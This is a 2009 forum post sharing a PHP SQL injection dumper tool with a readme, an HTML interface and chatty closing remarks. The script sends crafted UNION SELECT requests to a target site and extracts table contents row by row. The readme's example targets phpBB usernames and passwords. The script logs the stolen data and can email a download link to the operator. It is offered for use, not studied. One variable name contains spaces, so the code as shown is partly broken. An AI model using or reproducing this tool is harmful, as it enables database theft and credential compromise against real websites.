gblack's SQLi Dumper v1.7
Posted: Wed Dec 16, 2009 1:08 am
Code: Select all
<?php
/*********************************************************************
* I write this script because there was many SQLi Dumper script that *
* wont work when im trying to dump data from a SQLi bug of some site *
* which is has a good sec (i dont know what the sec) but in fact the *
* sec sh*t always ban my IP addr once i have dumped the data in line *
* 3000 or so. I thought that is an Anti-DDoS or something.. So why i *
* could dump with this script? Because i use file_get_contents and i *
* hope you understand what i mean by file_get_contents function in *
* PHP instead of using LWP::UserAgent in Perl or somethin in Python. *
* *
* Script name : gblack's SQLi Dumper (sqlidumper.php) *
* Info : Inspired from SSDp by Vrs-hCk *
* Version : 1.7 *
* Coded with : Notepad++ v5.4.5 (UNICODE) *
* Coder : gblack a.k.a biadabz *
* Contact : the_rumput_segar[at]yahoo.co.id (IM Only) *
* Thxz & greetz : Jack XShadow inc0mp13te b10 mywisdom Vrs-hCk *
* blackincyber(for the bug report) Vires *
* XCode MainHack ServerISdowN NetHeroes darkc0de *
* *
* /gblack- *
*********************************************************************/
/* CONFIGURATION START */
$email_reporting = 1; // Need mail() function enabled server; 1 = enable this feature; 0 = disable this feature
$report_to = "[email protected]"; // Separate with comma (,) for multiple box; Example: "[email protected],[email protected]"
$verbose = 0; // 1 = Print output to the browser; 0 = Do not print output to the browser (Recommended for big data dumping, just close the browser ;))
/* EOF CONFIGURATION */
error_reporting(0);
set_time_limit(0);
ignore_user_abort(true);
if(isset($_GET['dump'])) {
$file = $_GET['dump'];
$allow = explode("--.", $file);
$self = $_SERVER['SCRIPT_NAME'];
if((!$file) || ($allow[1] <> "txt") || (!file_exists($file))){ // Only .txt file allowed & bug patch => downloading self when the 'dump' is empty: '/sqlidumper.php?dump='
print "<script>alert('Not allowed!');</script>";
print "<meta HTTP-Equiv='refresh' content='0; URL=$self'>";
exit;
}
header("Content-type: text/plain");
header("Content-Disposition: attachment; filename=".$file);
readfile($file);
unlink($file);
exit;
}
?>
<html>
<head>
<style type="text/css">
body {
background-color: #000;
font-family: Courier New;
font-size: 12px;
color: #00FF00;
}
.textbox {
margin:1px;
border: #00FF00 1px solid;
font-size: 12px;
font-family: Courier New;
color: #00FF00;
background-color: #000;
}
#readme {
border: 1px solid #00FF00;
margin:3px;
padding: 2px;
width: 700;
background-color: #111;
}
#main {
border: 1px solid #00FF00;
margin:3px;
padding: 2px;
width: 700;
background-color: #111;
}
#readme {
display:none;
}
#res {
border: 1px solid #00FF00;
margin:3px;
padding: 2px;
width: 700;
background-color: #111;
}
#loading {
border: 1px solid #00FF00;
margin:3px;
padding: 2px;
width: 700;
}
a:link { color:#00FF00;}
a:hover { color:#00FF00;}
</style>
<script type="text/javascript" language="JavaScript">
function HideContent(d) {
document.getElementById(d).style.display = "none";
}
function ShowContent(d) {
document.getElementById(d).style.display = "block";
}
function ReverseDisplay(d) {
if(document.getElementById(d).style.display == "none") { document.getElementById(d).style.display = "block"; }
else { document.getElementById(d).style.display = "none"; }
}
</script>
</head>
<title> gblack's SQLi Dumper</title>
<body onload="HideContent('readme');HideContent('loading');">
<center>
[ <a href="javascript:ReverseDisplay('readme');"><b> gblack's SQLi Dumper<b></a> ]
<div id="readme" align="left">
Readme:<br>
- SQLi URL: You must include 'gblack' string in 1 of the visible column(s) (magic number)<br>
- End tag: You may use '--' or '/*' for this, depend on the error type<br>
- Database: You may not fill this field if you want to dump the data from default database<br>
- Table: This is the table where the coulmn(s) of the data will be dumped from<br>
- Column(s): This is the column(s) where the data will be dumped from<br>
<br>Usage example:<br>
- SQLi URL: http://www.target.com/index.php?id=1+union+all+select+1,gblack,3,4<br>
- End tag: --<br>
- Database: phpbb_forum<br>
- Table: phpbb_users<br>
- Column(s): username,password<br>
<br>Thxz & greetz goes to:<br>Jack XShadow inc0mp13te b10 mywisdom Vrs-hCk blackincyber Vires<br>
</div>
<div id="main" align="left">
<form action="" method="post"><br>
SQLi URL: 
<input name="url" class="textbox" type="text" value="" size="88"/><br>
End tag:   <input name="evasion" class="textbox" type="text" value="" size="5"/>
    Database:<input name="database" class="textbox" type="text" value="" size="20"/>
    Table:<input name="table" class="textbox" type="text" value="" size="20"/><br>
Column(s): <input name="column" class="textbox" type="text" value="" size="88"/><br>
<input name="query" class="textbox" value="Dump now!" type="submit" onClick="javascript:ShowContent('loading');HideContent('readme');">
</form>
</div>
<div id='loading' style="display:none;"><img src='http://www.techbd.com/images/loading.gif'></div>
<div id='res' align='left'>
<?php
if (isset($_POST['query'])) {
$tempik = trim($_POST['evasion']);
$sqli = trim($_POST['url']);
$db = trim($_POST['database']);
$table_name = trim($_POST['table']);
$column_name = trim($_POST['column']);
if (preg_match("/\+UNION\+/i", $sqli)){
$spasi = "+";
} else {
$spasi = "/**/";
}
if(!$sqli || !$tempik || !$table_name || !$column_name) {
print "<font color='red'>[!] Error: Please complete all required fields!</font>";
exit;
}
$tgl_lahir = date("d-m-Y");
if(preg_match("/https/i", $sqli)) {
$sitename = str_replace("https://", "", $sqli);
} else {
$sitename = str_replace("http://", "", $sqli);
}
$waktustart = date("h:i:s");
$namafl = explode("/", $sitename);
$logz = $namafl[0]."_".$db."_".$table_name."_".str_replace(",", "-", $column_name)."_".$tgl_lahir."--.txt";
$by = "0x67626C61636B";
$mbut = "UNHEX(HEX(CONCAT(".$by.",COUNT(*),".$by.")))";
$matamu = str_replace("gblack", $mbut, $sqli);
$picek = $matamu.$spasi."FROM".$spasi.$db.".".$table_name.$tempik;
if(!$db <> "") {
$picek = $matamu.$spasi."FROM".$spasi.$table_name.$tempik;
}
print "[+] Attempting to connect to $namafl[0] on port 80 ... <br>";
flush();ob_flush();
$konak = fsockopen($namafl[0], 80);
if (!$konak) {
print "<font color='red'>[!] Error: Failed to connect to $namafl[0]<br></font>";
exit;
} else {
print "[+] Connected to $namafl[0]<br><br>";
}
$hooh = @file_get_contents($picek);
if (preg_match("/gblack(.*?)gblack/i", $hooh, $iyo)) {
$logging = fopen($logz, "a+");
fwrite($logging, "==============================================================================================\r\n");
fwrite($logging, "| SQLi Dumper v1.7 |\r\n");
fwrite($logging, "| Coded © 2009 By gblack |\r\n");
fwrite($logging, "| the_rumput_segar[at]yahoo.co.id (IM Only) |\r\n");
fwrite($logging, "| |\r\n");
fwrite($logging, "| amit-amit Security! |\r\n");
fwrite($logging, "==============================================================================================\r\n\r\n");
fwrite($logging, "[+] SQLi URL: ".$sqli."\r\n");
fwrite($logging, "[+] Evasion used: \"".$spasi."\" and \"".$tempik."\"\r\n");
fwrite($logging, "[+] Database: ".$db."\r\n");
fwrite($logging, "[+] Table name: ".$table_name."\r\n");
fwrite($logging, "[+] Column(s) name: ".$column_name."\r\n");
print "[+] SQLi URL: ".$sqli."<br>";
print "[+] Evasion used: \"".$spasi."\" and \"".$tempik."\"<br>";
print "[+] Database: ".$db."<br>";
print "[+] Table name: ".$table_name."<br>";
print "[+] Column(s) name: ".$column_name."<br>";
flush();ob_flush();
$limit = $iyo[1];
fwrite($logging, "[+] There are ".$limit." entries to be extracted.\r\n\r\n");
print "[+] There are ".$limit." entries to be extracted.<br><br>";
} else {
print "<font color='red'>[!] Error: Could not get limit!</font>";
print "<script>HideContent('loading');</script>";
exit;
}
$Forum Yogyafree Keren Yach = "UNHEX(HEX(CONCAT(".$by.",CONCAT_WS(0x3a,$column_name),".$by.")))";
$xonthol = str_replace("gblack", $Forum Yogyafree Keren Yach, $sqli);
print "[+] Dumping data started at ".$waktustart." ".$tgl_lahir." ...<br><br>";
fwrite($logging, "[+] Dumping data started at ".$waktustart." ...\r\n\r\n");
for($id=0;$id<=$limit;$id++) {
$anak_ke = $id+1;
flush();ob_flush();
$kenthu = $xonthol.$spasi."FROM".$spasi.$db.".".$table_name.$spasi."LIMIT".$spasi.$id.",1".$tempik;
if(!$db <> "") {
$kenthu = $xonthol.$spasi."FROM".$spasi.$table_name.$spasi."LIMIT".$spasi.$id.",1".$tempik;
}
$hamil = @file_get_contents($kenthu);
if (preg_match("/gblack(.*?)gblack/i", $hamil, $kembar)){
fwrite($logging, "[".$anak_ke."] ".$kembar[1]."\r\n");
if($verbose) {
print "[".$anak_ke."] ".$kembar[1]."<br>";
print "<script>ShowContent('loading');</script>";
} elseif(!$verbose) {
print "<script>ShowContent('loading');</script>";
}
}
}
$waktufinish = date("h:i:s");
$tgl_mati = date("d-m-Y");
print "<br>[+] Dumping data finished at ".$waktufinish." ".$tgl_mati;
fwrite($logging, "\r\n[+] Dumping data finished at ".$waktufinish." ".$tgl_mati."\r\n\r\n");
fclose($logging);
print "<br>[+] <a href='?dump=$logz'>Click here to download the log file!</a>";
print "<script>HideContent('loading');</script>";
if($email_reporting) {
$to = $report_to;
$subject = 'Dump - '.$logz;
$message = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."?dump=".$logz;
$headers = 'From: Dumper Log<[email protected]>' . "\r\n" . 'X-Mailer: PHP/' . phpversion();
if(mail($to, $subject, $message, $headers) == false) {
print "<font color='red'><br>[!] Error: Could not send email report!";
} else {
print "<br>[+] Email report sent!";
}
}
}
?>
</div>
</center>
</body>
</html>Code: Select all
http://ngaceng-a.biz/sqlidumper.txt**wogh!** :omg:
Ditunggu comment na gan!! :malumalu:
Brb dl... Ngisi ilmu... :tapa: